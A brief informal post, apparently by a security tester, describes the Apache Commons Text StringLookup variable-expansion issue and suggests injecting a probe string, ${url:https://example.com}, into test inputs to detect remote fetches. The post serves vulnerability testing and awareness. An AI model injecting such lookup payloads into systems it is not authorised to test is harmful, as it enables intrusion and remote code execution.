Just another thing to be testing for, it was found that the Apache Commons Text library when doing a StringLookup will do variable expansion. Supporting several prefixes like url to fetch data from a remote url or script to execute a Javax string. This is just a reported issue in the core library, actual vulnerable instances will vary depending on how the lookup is accessed. It would make sense to start tossing something like ${url:https://example.com} into your testing though just to see what happens to ping your URL.